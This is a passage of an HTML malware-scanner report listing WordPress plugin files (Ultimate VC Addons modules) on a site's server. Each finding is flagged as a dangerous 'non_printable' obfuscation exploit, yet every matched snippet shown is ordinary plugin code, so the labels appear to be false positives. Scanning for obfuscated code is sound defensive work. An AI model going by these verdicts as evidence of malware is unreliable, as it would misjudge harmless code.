</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 685</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_style'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_ultimate_font_style</span><span style="color: #007700">(</span><span style="color: #0000BB">$font_style</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$temp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'enquque_ultimate_google_fonts_optimzed'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 710</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enquque_ultimate_google_fonts_optimzed</span><span style="color: #007700">(</span><span style="color: #0000BB">$enqueue_fonts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_google_font_scripts</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 93</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_selected_ultimate_google_fonts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_319").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_list_icon.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.96 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_320" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_List_Icon'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_List_Icon </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_List_Icon</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCodesContainer' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_icon_list' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_icon_li</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">list_icon_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for list </span><span style="color: #0000BB">Icon</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_icon_list_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 344</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_list_item_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_320").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_hotspot.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 35.16 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_321" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">(</span><span style="color: #DD0000">'dev_mode'</span><span style="color: #007700">); if(</span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">=== </span><span style="color: #DD0000">'enable'</span><span style="color: #007700">) { </span><span style="color: #0000BB">$js_path </span><span style="color: #007700">= </span><span style="color: #DD0000">'../assets/js/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$css_path </span><span style="color: #007700">= </span><span style="color: #DD0000">'../assets/css/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; } else { </span><span style="color: #0000BB">$js_path </span><span style="color: #007700">= </span><span style="color: #DD0000">'../assets/min-js/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$css_path </span><span style="color: #007700">= </span><span style="color: #DD0000">'../assets/min-css/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">'.min'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 290</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_hotspot_param_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_admin_assets</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_hotspot_items_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_321").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_sticky_section.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_322" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_sticky_section_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_sticky_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'fixto'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">), </span><span style="color: #0000BB">ULTIMATE_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_sticky_section_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'sticky-section'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array(</span><span style="color: #DD0000">'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 191</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sticky_shortcode_mapper</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 193</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sticky_shortcode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 403</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sticky_shotcode_mapper</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_sticky_section_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_322").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_info_tables.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 27.80 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_323" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Info_Table</span><span style="color: #007700">; if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_info_table' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_info_table </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_table_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_it_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_it_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_323").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_stats_counter.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 33.40 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_324" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'AIO_Stats_Counter'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$AIO_Stats_Counter </span><span style="color: #007700">= new </span><span style="color: #0000BB">AIO_Stats_Counter</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_stat_counter' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_stat_counter </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortC</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_counter_assets</span><span style="color: #007700">()</span>
</span>
